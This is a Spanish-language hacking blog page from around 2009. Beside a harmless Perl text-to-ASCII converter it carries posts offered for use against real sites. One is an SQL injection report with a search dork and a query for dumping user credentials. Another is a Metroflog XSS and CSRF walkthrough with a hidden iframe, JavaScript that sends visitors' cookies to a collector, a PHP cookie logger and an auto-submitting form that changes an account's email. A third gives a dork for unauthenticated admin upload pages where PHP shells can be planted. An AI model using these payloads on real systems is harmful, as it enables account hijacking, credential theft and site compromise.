Zer0 z0orG :: Diosdelared.com

Blogs de iNSeguridad Informática

Lo nice!!

Acá un video:

Fuente: http://www.zer0-z0org.com

Sobre este blog:

Nick: Zer0 z0orG

Edad: 20Años

Pais: Mèxico

Intereses: inSeguridad web, girls & beers



Descripciòn:

Soy un chico sencillo, agradable, sincero, bromista, enojon, y muy celoso jijiji.



Movies:

Rapido y Furioso 1,2,3,4

60 Segundos

El transportador 1,2,3

Taxi

A2Racer

FastTrack No limits



Musica:

Me gusta casi todo con la excepcion del pop jiji.

Blogroll: 33

[x] Agregar a zer0-z0org

dy74h4nd120 dy74h4nd120
pandrax pandrax
refused refused
wacko wacko
w3r0x w3r0x
em3trix em3trix
thanatos thanatos
applemex applemex
ponymagic ponymagic
fresnohacker fresnohacker
xianur0 xianur0

... Ver todos

Perfil de zer0-z0org

[x]Nick: zer0-z0org
Rango: Master
País: mx
Visitas: 56404
Votos: 126
En Blogrolls: 70
Status: PM

Patrocinadores:



Anuncia aquí

[x] Conversor de texto a ASCII By GaMa

Publicado el 02/02/2010 12:02:00 en Hacking Tools. Total de votos: 1  Votar

Bueno pues me comenta gama que postee esto en mi bog por que a el se le olvido la pass del suyo xD.

#!/usr/bin/perl

print "\n\n\n";

print "\t\t\t****************************\n";
print "\t\t\t*                          *\n";
print "\t\t\t*^^^^^^^^^^^^^^^^^^^^^^^^^^*\n";
print "\t\t\t*                          *\n";
print "\t\t\t*==========================*\n";
print "\t\t\t*                          *\n";
print "\t\t\t*     Code BY -GaMa-       *\n";
print "\t\t\t*                          *\n";
print "\t\t\t*==========================*\n";
print "\t\t\t*                          *\n";
print "\t\t\t*     Conversor ASCII      *\n";
print "\t\t\t*                          *\n";
print "\t\t\t*==========================*\n";
print "\t\t\t*                          *\n";
print "\t\t\t*^^^^^^^^^^^^^^^^^^^^^^^^^^*\n";
print "\t\t\t*                          *\n";
print "\t\t\t****************************\n";

print "\n";

print "[+] Introduce el texto a convertir: ";

$_ = <STDIN>;

chop ($_);

print "\n";

print "[+] Valor ASCII: ";

# Letras minusculas

s /[a]/97,/g; 
s /[b]/98,/g; 
s /[c]/99,/g; 
s /[d]/100,/g; 
s /[e]/101,/g; 
s /[f]/102,/g;
s /[g]/103,/g;
s /[h]/104,/g;
s /[i]/105,/g;
s /[j]/106,/g;
s /[k]/107,/g;
s /[l]/108,/g;
s /[m]/109,/g;
s /[n]/110,/g;
s /[o]/111,/g;
s /[p]/112,/g;
s /[q]/113,/g;
s /[r]/114,/g;
s /[s]/115,/g;
s /[t]/116,/g;
s /[u]/117,/g;
s /[v]/118,/g;
s /[w]/119,/g;
s /[x]/120,/g;
s /[y]/121,/g;
s /[z]/122,/g;

# Caracteres Especiales


s /[_]/95,/g;
s /[@]/64,/g;
s /[-]/45,/g;

# Letras mayusculas

s /[A]/65,/g;
s /[B]/66,/g;
s /[C]/67,/g;
s /[D]/68,/g;
s /[E]/69,/g;
s /[F]/70,/g;
s /[G]/71,/g;
s /[H]/72,/g;
s /[I]/73,/g;
s /[J]/74,/g;
s /[K]/75,/g;
s /[L]/76,/g;
s /[M]/77,/g;
s /[N]/78,/g;
s /[O]/79,/g;
s /[P]/80,/g;
s /[Q]/81,/g;
s /[R]/82,/g;
s /[S]/83,/g;
s /[T]/84,/g;
s /[U]/85,/g;
s /[V]/86,/g;
s /[W]/87,/g;
s /[X]/88,/g;
s /[Y]/89,/g;
s /[Z]/90,/g;

print $_;

print "\n";

print "[+] ================================";

print "\n[+] Escriba cualquier valor para salir";
print "\n\n";

$salida=<STDIN>;
chop($salida);


print "\n[+] Adios";

exit;


Nota By GaMa: Al final de cada conversion ignoren la ultima coma.

Comentarios: 7 | Leer comentarios

[x] CMS Ecuatoriano Vuln[SQLi]

Publicado el 19/12/2009 12:12:00 en Bug Report. Total de votos: 2  Votar




######################
*Script:
No se como se llame
Vuln: SQL Injection
######################
*Oficial Web:
http://www.xxx.com.ec
######################
*Author:
Zer0 z0orG
######################
*Dork:

inurl:"Titulos.php?Med="
######################
*Tabla:
usuario

*Columnas:
concat(usuario,0x3a,clave)
######################


Comentarios: 9 | Leer comentarios

[x] em0dr1nk Testeando XSS y CSRF [Metroflog]

Publicado el 21/11/2009 12:11:00 en Hacking Web. Total de votos: 10  Votar

Bueno como ya sabemos algunos por el post de munder y de xmox
otros por otro lado, pues metroflog tiene xss y csrf.

Pero para que explico todo no? mejor solo como testearlo para poder prevenirnos
que es lo que nos interesa...

Bueno primero veamos el xss
http://www.metroflog.com/dangerously-cute/20081014/n_la_termo?pos="><script>alert(/xss?/)</script>

Como el atacante ya sabe que hay xss, ahora tratara de robarnos nuestra cookie para asi
usar algun editor y kakearnos.

Atakante(em0dr1nk) pensando en como atakar:

em0dr1nk piensa, quiero tener cuentas de las mas mamis de metroflog
para asi pedirles una foto priv8 con mi nick en su body pero son refresas
como are para que caigan estas plebes(sin perder tanto time).

AutoRespuestas de em0dr1nk:

1.- Uso el boot que hizo knet y spameo todos los metroflogs coolss con una invitacion
a mi super pagina fresa, donde tengo el iframe.
2.- Kakeo paginas donde se que ingresan las super mammis y les meto el mismo iframe
que en mi super pagina fresa.


Atakanete(em0dr1nk) cocinando el codigo malintencionado:
 <iframe frameborder="0" width="0" height="0" src="http://www.metroflog.com/dangerously-cute/20081014/n_la_termo?pos=%22%3E%3Cscript%20src=%22http://localhost/xsscookie.js%22%3E"></iframe>

Donde xsscookie.js tiene como contenido:
 var sitio='http://localhost/damela.php?cookie='
location.href=sitio+document.cookie

y damela.php conteniendo:
<?php
$cookie=$_GET['cookie'];
$cook=fopen("cookies.txt",'a');
fwrite($cook, "Cookie: \n".$cookie."\n\n**************");
fclose($cook);
?>


ya teniendo em0dr1nk el codigo malintencionado lo mete en su index,
esperando que las super mamis de MundeR y o0o_zeus_o0o caigan
ya que segun el primo0o(cereal) tienen buena pompi.

Mientras em0dr1nk le tiraba royo a syndr0me que tenia muy buena cola(de cabello)
y esto y lo otro, entrando a su site http://localhost/cookies.txt
ve que tiene la cookie de la cuenta de MundeR a lo cual abre su editor de cookies
y ve que es todo un royo andar cambiando las cookies y se decide en usar el csrf
que wh173ju4k3r1l encontro en sus ratos libres.

El csrf:
<form method="post" name="formx" action='http://www.metroflog.com/accountinfo.php'><table width="500" border="0" cellpadding="2" cellspacing="0" class="ben"><input type="text" name="email" maxlength="50" value="tumailx@hotmail.com" size="35"></td><td><input type="submit" name="actualizar" value="Actualizar"></td></form>
<script>document.formx.submit();</script>

ahora bien em0dr1nk dice facil, hago lo mismo lo meto en form.html y meto un ifram...

Continúa aquí...

Comentarios: 24 | Leer comentarios

Feliz cumple kaOs!

Publicado el 07/11/2009 12:11:00 en Noticias.



pes aka dandole un feliz cumple al kaossssssssss
k te la ayas pasado shingo tu dia bro, saludinessss


Feliz cumple de tods tus amigos de ddlr, RE y todas las comunidadex =)

Comentarios: 7 | Leer comentarios

[x] BypassAdmin Uploader [CMS][phpshell[mailer][etc]

Publicado el 03/11/2009 12:11:00 en Hacking Web. Total de votos: 7  Votar



Tenemos un cms que no ocupa el logeo para subir archivos
asi que pues facil no?

Nombre cms: [Ni idea, le pondremos DKey que asi dice el titulo jaja.]

Version: [??]

Dork: [inurl:"/admin/descargas/"]

Found By: 0o_zeus_o0 && Zer0 z0orG

Happy uploads jaja

Nota: No se ocupa muxa explicacion y menos muxo conocimieto para subir una phpshell en un upload o si?

Greetz: Zeus, nesok, cereal, munder, poison, wer0x, komtec, mbyte, kaos, gothic, kanet, kikin, ricolino, pandrix, tunich, xianurin.

&&

DDLR, #RE, HSLTeam, MTeam

Comentarios: 23 | Leer comentarios
Ver: Siguientes 5



Powered by Diosdelared.com CMS Blogs
© Diosdelared 2009